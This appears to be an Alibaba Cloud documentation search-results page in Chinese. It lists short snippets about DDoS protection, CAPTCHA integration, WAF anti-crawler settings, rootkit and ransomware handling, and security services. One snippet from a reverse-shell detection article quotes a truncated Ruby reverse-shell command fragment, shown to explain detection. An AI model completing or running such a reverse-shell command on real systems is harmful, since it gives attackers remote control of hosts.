安全服务介绍

无《安全意识评估报告》红蓝对抗实战演练服务 红蓝对抗演练组织 阿里云协助客户统筹红蓝对抗实战攻防演练的方案、计划及各项工作。在演练结束后阿里云梳理演练过程中蓝军的攻击思路、成果路径、攻击手法,红军协防过程中监测到的攻击事件、...

产品优势

人工智能:运用机器学习算法,与风险对抗过程中不断学习与进化,风险识别快人一步。灵活接入:接口级服务,高易用性,快速接入。全链路防控:结合客户端边缘计算与云端大数据,全链路对抗粗暴机刷与精细化人刷等风险操作手法。

检测Linux Rootkit入侵威胁

高级对抗型Rootkit检测 在云服务器的大量分析中,已经发现有部分对抗型Rootkit,用于对抗类似Volatility的一般内核内存取证形式的扫描检测。我们目前的检测机制,已经支持对这类混淆和对抗的绕过。这类对抗型Rootkit,一般会尝试在已隐藏...

客户案例

第一次对抗发生在安全解决方案部署完成之后,黑客很快发现仅靠大流量攻击完全打不下来,于是黑客开始破解游戏客户端,将游戏客户端破解之后就发现了游戏客户端中对于流量调度的原理,这样就能够把所有的 IP 防护节点全部找出来,之后对于找...

功能特性-智能调度

技术革新:智能调度算法拆分流量 DDoS攻防的本质,是资源的对抗。从网络、CDN、服务器到数据库,只要存在资源差的地方,就可以有DDoS攻击在发生。资源类别 用户 黑客 带宽资源 G级别有限的带宽和峰值触发方式的黑洞机制 T级别压倒性带宽...

账户安全最佳实践

阿里云验证码服务基于阿里巴巴集团多年来对抗黑灰产的经验所形成的一套完整的人机识别和风控体系,提供包括无痕验证在内的多种验证方式,帮助您有效对抗职业黑灰产的攻击,同时避免对正常用户的干扰。更多信息,请参见人机验证在线体验页面...

功能更新公告

通过这种方式在App业务中接入验证码服务,您无需再为Native App组件中的各种依赖、引用导致的兼容性问题而感到困扰,而移动端HTML5业务类型的验证码组件的快速迭代也将帮助您的App业务更好地应对“强对抗”场景。关于在App业务中接入移动端...

银行如何基于IPv6建设CDN内置安全能力

存在真实的攻防强对抗场景。金融行业基础设施受国内最高等级的安全监管。该银行的云服务能力在大型银行中领先,以电子商城、住房租赁、智慧政务、智慧社区等为代表的大流量应用,对用户访问带宽和时延高度敏感,更加依赖CDN加速,同时强调...

概述

App防护能够解决哪些安全问题 App防护集成了阿里巴巴集团多年来对抗黑灰产、羊毛党的经验和技术积累。为App集成App防护SDK后,您的App将获得与天猫、淘宝、支付宝等App端相同的可信通信技术能力,并可共享阿里巴巴集团多年对抗黑灰产、羊毛...

什么是实人认证

安全对抗丰富经验源自阿里巴巴多年风险对抗实战经验,实人认证从风险感知,监测和处置方面,为您提供安全认证服务。应用场景 实人认证支持如下应用场景:社交娱乐行业通过活体检测和实人认证技术,判断当前操作用户的信息真实有效,防范...

云安全中心反弹Shell多维检测技术详解

IO.popen(cmd,"r"){|io|c.print io.read}end' 在这种场景下,反弹Shell的命令执行和正常业务行为变得更加难以区分,对抗程度上升,除了从进程命令行尽可能的覆盖这类反弹Shell的特征以外,云安全中心通过异常命令行为序列、异常Shell启动...

在Android App中接入HTML5滑块验证

随着混合模式移动应用(Hybrid App)开发技术的日益成熟,您可以通过在App业务中启用WebView组件的方式直接接入移动端HTML5业务类型的滑动验证组件,实现App业务中的人机对抗。用户只需通过类似滑动解锁的方式实现验证码,对正常用户来说...

发布日志

V1.14@2019-09-20 上行弱网环境的对抗策略优化,提升弱网视频发布的通信质量。音频首帧回调,摄像头管理,自定义渲染,更丰富的数据监控。V1.2@2018-08-25 优化弱网体验,丢包网络下,延时更低、视频更清晰 V1.1@2018-08-07 首次发布。...

发展历史

在游戏盾诞生之前的很长一段时间,阿里云安全团队对游戏行业的攻防对抗模式反复分析,深入了解了游戏业务的注册特点、登录特点、玩家特点,并在此基础上重构了游戏盾的智能调度算法。游戏盾继承了云层快速调度的能力,又通过对端信息的采集...

服务介绍

系统稳定性高,使用成本低基于阿里云音视频通信基础平台,拥有全球实时智能调度系统,运用行业领先的视频编码、弱网对抗等算法,系统稳定性高。通过精细化服务运营与实时高效的网络调度,单位成本低。强大、灵活的安全机制使用信令HTTPS...

固件加固

固件加固是通过对ELF二进制文件进行多个维度的加固处理,提升物联网设备固件的安全水位,以对抗逆向工程与漏洞利用。固件加固主要是由C、C++等高级语言编译出的Linux平台下的ELF程序,如静态库、动态库、可执行文件(.o,.so,.bin等)。...

威胁狩猎服务

企业需要一种技术手段,主动对抗攻击行为,采取有利于防守方的技术措施,对攻击者形成震慑,保护数据安全。为了改变网络空间攻守力量不对称性,弥补传统防御方式的不足,快速感知威胁、延缓攻击、保护资产安全,欺骗伪装技术应运而生。简介...

DDoS攻击解决方案——游戏盾

在游戏盾诞生之前的很长一段时间,阿里云安全团队对游戏行业的攻防对抗模式反复分析,深入了解了游戏业务的注册特点、登录特点、玩家特点,并在此基础上重构了游戏盾的智能调度算法。游戏盾继承了云层快速调度的能力,又通过对端信息的采集...

产品架构

针对攻击,阿里云在传统的代理、探测、反弹、认证、黑白名单、报文合规等标准技术的基础上,结合Web安全过滤、信誉、七层应用分析、用户行为分析、特征学习、防护对抗等多种技术,对威胁进行阻断过滤,保证被防护用户在攻击持续状态下,仍...

什么是音视频通信

阿里云RTC拥有全球实时智能调度系统,并结合实时媒体处理系统和1500+边缘节点服务,运用行业领先的音频3A(AGC、AEC、ANS)、视频编码、弱网对抗等算法,为您提供低延时、抗丢包的音视频实时通信。产品定价 阿里云RTC为您提供按量计费和预...

云防火墙防御挖矿蠕虫最佳实践

针对一些通用的漏洞利用方式(如利用Redis写Crontab执行命令、数据库UDF进行命令执行等),云防火墙的基础防御基于阿里云的大数据优势,利用阿里云安全在云上攻防对抗中积累大量恶意攻击样本,形成精准防御规则,具有极高准确性。...

使用WKWebView在IOS App中接入滑动验证(Swift)

随着混合模式移动应用(Hybrid App)开发技术的日益成熟,您可以通过在App业务中启用WebView组件的方式直接接入移动端HTML5业务类型的滑动验证组件,实现App业务中的人机对抗。用户只需通过类似滑动解锁的方式实现验证码,对正常用户来说...

使用WKWebView在iOS App中接入滑动验证(OC)

随着混合模式移动应用(Hybrid App)开发技术的日益成熟,您可以通过在App业务中启用WebView组件的方式直接接入移动端HTML5应用类型的滑动验证组件,实现App业务中的人机对抗。使用者只需通过滑动解锁的方式来实现验证码,即可轻松通过人机...

概述

此外,爬虫风险管理往往与业务自身的特性有很强的关联性,需要专业的安全团队进行对抗才能取得较好的效果。如果您对防爬效果有较高的要求,或者缺乏专业的安全团队来配置相应的安全策略,您可以使用Web应用防火墙提供的防爬场景化功能,...

使用UIWebView在iOS App中接入HTML5滑块验证

随着混合模式移动应用(Hybrid App)开发技术的日益成熟,您可以通过在App业务中启用WebView组件的方式直接接入移动端HTML5业务类型的滑动验证组件,实现App业务中的人机对抗。用户只需通过类似滑动解锁的方式来实现验证码,对正常用户来说...

安全培训

攻防对抗体系建设 攻防安全,包括各种常见漏洞的攻击原理和防护手段(含现场演练)。APP安全,包括APP上常见的安全漏洞、攻击手段及防御方法(含现场演练)。运维安全,包括网络安全、系统安全、中间件/web service、应用安全、人员安全...

计费方式

180000/天(8课时)攻防对抗体系建设 30人以内 280000/5天(40课时)30-60人 560000/5天(40课时)100人以内 840000/5天(40课时)威胁狩猎服务计费方式 根据服务版本确定 服务版本 计费周期 价格(元)仿真定制(套/元)探针扩容(个/元)...

配置DCDN WAF

说明 典型爬虫行为识别提供典型爬虫行为识别的通用算法实例,可配置基本业务参数和风险阈值进行机器学习,输出智能防护结果以对抗高级爬虫。您可以根据实际需求,单击前去配置,添加算法规则。爬虫威胁情报 状态 爬虫威胁情报开关。说明 ...

发布日志

V1.14@2019-09-20 上行弱网环境的对抗策略优化,提升弱网视频发布的通信质量。音频首帧回调,摄像头管理,自定义渲染,更丰富的数据监控。V1.2@2018-08-25 优化弱网体验,丢包网络下,延时更低、视频更清晰 V1.1@2018-08-07 首次发布。...

Web客户端漏洞类型

验证码是对抗CSRF攻击最简单有效的方法,但会影响用户的使用体验,并且不是所有的操作都可以添加验证码防护。因此,验证码只能作为辅助验证方法。通用防护方法:添加足够随机的csrf_token并每次更新,以防止参数被猜解。使用CSRF_token是...

处理病毒查杀告警

云安全中心针对Crontab、恶意下载源等持久化方式提供专项分析清除能力,同时引入AI智能学习能力,不断提升安全对抗能力,实现小时级的快速响应处置能力。深度查杀模式下,支持选择先自动创建快照备份您的服务器系统盘,再进行病毒查杀,...

系统安全防御最佳实践

系统安全是业务安全稳定运行的重要因素之一,随着网络安全对抗的愈演愈烈,规模化的自动化攻击、蠕虫、勒索、挖矿、APT等攻击形式逐渐增多,给系统的安全运行带来了很大的挑战。默认安装的系统存在以下安全威胁,易导致系统被入侵:系统...

版本更新记录

V1.14@2019-09-20 上行弱网环境的对抗策略优化,提升弱网视频发布的通信质量。音频首帧回调,摄像头管理,自定义渲染,更丰富的数据监控。V1.2@2018-08-25 优化弱网体验,丢包网络下,延时更低、视频更清晰 V1.1@2018-08-07 首次发布。...

附件四:常见漏洞危害及定义(先知计划)

使用安全的存储过程可在一定程度上对抗SQL注入,但要注意此种方法并不是100%安全。严格检查用户数据。对用户传入的数据类型及内容进行严格的检查。对数据类型检查,如利用ID查询时判断是否为整型,输入邮箱时判断邮箱格式,输入时间、日期...

云安全中心产品专家服务说明

对抗性清理。其他不属于云安全中心产品专家服务的需求。客户与阿里云分工说明 责任主体 具体分工 客户与阿里云 客户购买云安全中心产品专家服务,应在阿里云承接服务后,提供场地、设备、必要的非生产环境及远程访问通道、权限、明确的...

加密勒索病毒处理方案

注意:随着加密勒索软件对抗的不断升级,加密勒索软件可以在很短的时间内出现变种,使用工具不一定保障数据能够恢复成功。解密工具作为安全厂商,卡巴斯基实验室破解了世界上大部分勒索病毒,更多勒索软件破解器请随时关注:卡巴斯基:勒索...

功能概述

由无痕验证组件收集并统一调度下游验证码服务实现综合人机对抗的识别与处理。在业务中接入无痕验证后,组件完全静默采集所需信息,从而对大部分正常用户完全“零打扰”,仅对存在风险的用户根据风险等级返回相应验证码)。无痕验证采用...

流量安全总览

也可以通过部署防御方案,为业务部署DDoS高防(新BGP)、DDoS原生防护服务,提升业务对抗DDoS攻击的防御能力。关于具体方案的介绍及如何开通,请参见立即处理页面的说明。安全防御数据说明 安全防御展示了您的网络资产的安全防护状态(例如...

配置CDN WAF

说明 典型爬虫行为识别提供典型爬虫行为识别的通用算法实例,可配置基本业务参数和风险阈值进行机器学习,输出智能防护结果以对抗高级爬虫。您可以根据实际需求,单击前去配置,添加算法规则。爬虫威胁情报 状态 爬虫威胁情报开关。说明 ...

游戏行业最佳实践

技术架构 阿里云全站加速DCDN旨在帮助游戏厂商在游戏更新/下载、回合游戏、实时对抗、信令交互、游戏出海、游戏安全等场景,构建快速、稳定、流畅的网络环境和访问体验。您可以在不修改业务逻辑的情况下,快速接入DCDN。应用场景 游戏下载...
< 1 2 >
跳转至: GO

新品推荐

你可能感兴趣

热门推荐

新人福利专场 阿里云试用中心 企业支持计划 飞天会员助力企业低成本上云 智能财税30天免费试用 云解析DNS新用户首购低至36元/年起 ECS限时升级特惠6.5折